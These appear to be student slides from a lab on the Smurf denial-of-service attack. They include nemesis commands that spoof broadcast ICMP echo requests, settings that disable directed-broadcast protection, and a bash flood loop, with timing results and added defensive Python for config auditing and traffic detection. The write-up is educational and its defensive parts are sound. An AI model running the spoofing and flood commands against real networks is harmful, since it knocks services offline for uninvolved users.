Smurf Attack Farhan Sajjad
Outline
- Smurf Attack
- What is a Smurf Attack?
- How is it Engineered?
- Project 1
- Test Environment
- Conducting the Attack
- Results and Observations
- References
- Questions?

What is a Smurf Attack?
- Denial of Service Attack using spoofed broadcast ping messages.

How is it Engineered?
- Essentially, by “spoofing” a broadcasted ICMP Echo request with the victim’s IP address as the sender
[Figure: The ICMP Header]
Sample Spoof

    root@jotil.Move# nemesis icmp -v -i 8 -c 0 -S 192.168.0.5 -D 192.168.0.255 -H 08:00:27:29:4C:F0

    ICMP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

    [MAC] 08:00:27:29:4C:F0 > FF:FF:FF:FF
    [Ethernet type] IP (0x0800)
    [IP] 192.168.0.5 > 192.168.0.255
    [IP ID] 3121
    [IP Proto] ICMP (1)
    [IP TTL] 255
    [IP TOS] 0x00
    [IP Frag offset] 0x0000
    [IP Frag flags]
    [ICMP Type] Echo Request
    [ICMP Code] Echo Request
    [ICMP ID] 57730
    [ICMP Seq number] 8233

    Wrote 42 byte ICMP packet through linktype DLT_EN10MB.
    ICMP Packet Injected
The Test Environment
The Test Environment (continued)
- All the Linux machines had Wireshark installed on them
- The attacker had Nemesis installed on it, to generate spoofed IP packets
- The victim had an HTTP server on it, to check its availability
- Had to turn on IP directed broadcast handling (that is, switch off the No-IP Directed Broadcast protection)
  - Linux OS:

        root@jotil.Move# echo "0" | cat > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

  - Cisco IOS:

        Router.C(config)#int f0/0
        Router.C(config-if)#ip directed-broadcast
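The two settings changed above are the ones a defender audits for. The following is an added example, not part of the original slides: it flags interfaces in a running-config style text that carry `ip directed-broadcast` and interprets the Linux `icmp_echo_ignore_broadcasts` value. The sample config and all function names are constructed for illustration.

```python
import re

# Constructed sample in running-config style; not taken from the lab router.
SAMPLE_IOS = """\
interface FastEthernet0/0
 ip address 192.168.0.1 255.255.255.0
 ip directed-broadcast
!
interface FastEthernet0/1
 ip address 10.0.0.1 255.255.255.0
 no ip directed-broadcast
!
interface Serial0/0
 ip directed-broadcast 101
!
"""

SYSCTL_PATH = "/proc/sys/net/ipv4/icmp_echo_ignore_broadcasts"

def directed_broadcast_interfaces(ios_config):
    """Return the interfaces whose block enables 'ip directed-broadcast'.

    An access-list argument ('ip directed-broadcast 101') narrows who may use
    the feature but still leaves it enabled, so it is reported as well.
    """
    exposed, current = [], None
    for line in ios_config.splitlines():
        header = re.match(r"interface\s+(\S+)", line)
        if header:
            current = header.group(1)
        elif not line.startswith(" "):
            current = None                 # '!' or a global line ends the block
        elif current and re.match(r"\s+ip directed-broadcast\b", line):
            exposed.append(current)        # the 'no ...' form does not match
    return exposed

def answers_broadcast_ping(sysctl_value):
    """True when the host replies to broadcast echo requests (value 0)."""
    return sysctl_value.strip() == "0"

def read_sysctl(path=SYSCTL_PATH):
    """Read the live value on a Linux host."""
    with open(path) as fh:
        return fh.read()

if __name__ == "__main__":
    print("directed broadcast enabled on:", directed_broadcast_interfaces(SAMPLE_IOS))
    print("host answers broadcast ping:", answers_broadcast_ping(read_sysctl()))
```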
Conducting the Attack
- Created a small payload file of size 1472 bytes
- Ran a small script at the attacking machine, which looped to send spoofed ICMP packets

    #!/bin/bash
    # Send 10000 spoofed echo requests, printing the countdown after each one
    i=10000
    while test $i != 0
    do
        nemesis icmp -i 8 -c 0 -S 192.168.0.5 -D 192.168.0.255 -H 00:06:29:DF:2A:DA -P payload_file
        echo "$i"
        i=`expr $i - 1`
    done
Results The Attacker’s Screenshot
The Victim’s Screenshot During Attack
The Victim’s Screenshot After Attack
The Observer’s Screenshot
    root@hpgcpc06:/home/farhan# time wget 192.168.0.5
    --2009-11-13 20:49:45--  http://192.168.0.5/
    Connecting to 192.168.0.5:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 177 [text/html]
    Saving to: `index.html'

    100%[===================>] 177         --.-K/s   in 0s

    2009-11-13 20:49:45 (15.1 MB/s) - `index.html' saved [177/177]

    real    0m0.008s
    user    0m0.004s
    sys     0m0.000s

    root@hpgcpc06:/home/farhan# time wget 192.168.0.5
    --2009-11-13 20:50:03--  http://192.168.0.5/
    Connecting to 192.168.0.5:80... failed: Connection timed out.
    Retrying.
    .
    .
    --2009-11-13 20:59:36--  (try: 4)  http://192.168.0.5/
    Connecting to 192.168.0.5:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 177 [text/html]
    Saving to: `index.html'

    100%[===================>] 177         --.-K/s   in 0s

    2009-11-13 20:59:36 (18.1 MB/s) - `index.html' saved [177/177]

    real    9m33.041s
    user    0m0.008s
    sys     0m0.000s
Observations
- The number of participating nodes is crucial to the effectiveness of the attack
- It hardly affected the CPU or memory utilization of the victim; however, its network resources were overwhelmed and its services were unreachable
- Networked devices after 1998 have turned off IP directed broadcasts (No-IP Directed Broadcast), so it is difficult to conduct such attacks; however, Smurf Amplifiers exist!
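The traffic pattern behind these observations can be recognised in a capture: one host named as the sender of a broadcast echo request, then echo replies converging on it from many nodes. The following is an added detection example, not part of the original slides; the packet tuples are a constructed summary of the kind exported from Wireshark, and the function name, window and threshold are assumptions.

```python
import ipaddress
from collections import defaultdict

ECHO_REPLY, ECHO_REQUEST = 0, 8  # ICMP type numbers

# Constructed capture summary: (seconds, source IP, destination IP, ICMP type).
SAMPLE = [
    (0.000, "192.168.0.5", "192.168.0.255", 8),   # broadcast ping "from" .5
    (0.001, "192.168.0.10", "192.168.0.5", 0),
    (0.001, "192.168.0.11", "192.168.0.5", 0),
    (0.002, "192.168.0.12", "192.168.0.5", 0),
    (0.002, "192.168.0.13", "192.168.0.5", 0),
    (0.500, "192.168.0.20", "192.168.0.21", 8),   # ordinary unicast ping
    (0.501, "192.168.0.21", "192.168.0.20", 0),
]

def find_smurf_victims(packets, network, window=1.0, min_responders=3):
    """Return {victim_ip: peak distinct responders seen within `window` s}.

    A host is reported when it is named as the sender of an echo request to
    the subnet broadcast address and is then hit by echo replies from at
    least `min_responders` different hosts inside one time window.
    """
    broadcast = str(ipaddress.ip_network(network).broadcast_address)
    broadcast_pingers = set()
    replies = defaultdict(list)            # destination -> [(ts, responder)]
    for ts, src, dst, icmp_type in sorted(packets):
        if icmp_type == ECHO_REQUEST and dst == broadcast:
            broadcast_pingers.add(src)
        elif icmp_type == ECHO_REPLY:
            replies[dst].append((ts, src))
    victims = {}
    for dst in broadcast_pingers.intersection(replies):
        seen, start, peak = replies[dst], 0, 0
        for end in range(len(seen)):
            while seen[end][0] - seen[start][0] > window:
                start += 1                 # drop replies older than the window
            peak = max(peak, len({src for _, src in seen[start:end + 1]}))
        if peak >= min_responders:
            victims[dst] = peak
    return victims

if __name__ == "__main__":
    print(find_smurf_victims(SAMPLE, "192.168.0.0/24"))
```

The responder count per victim is the number of participating nodes the first observation refers to, so it also gives a rough measure of the amplification seen in the capture.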
Questions?
Thank You!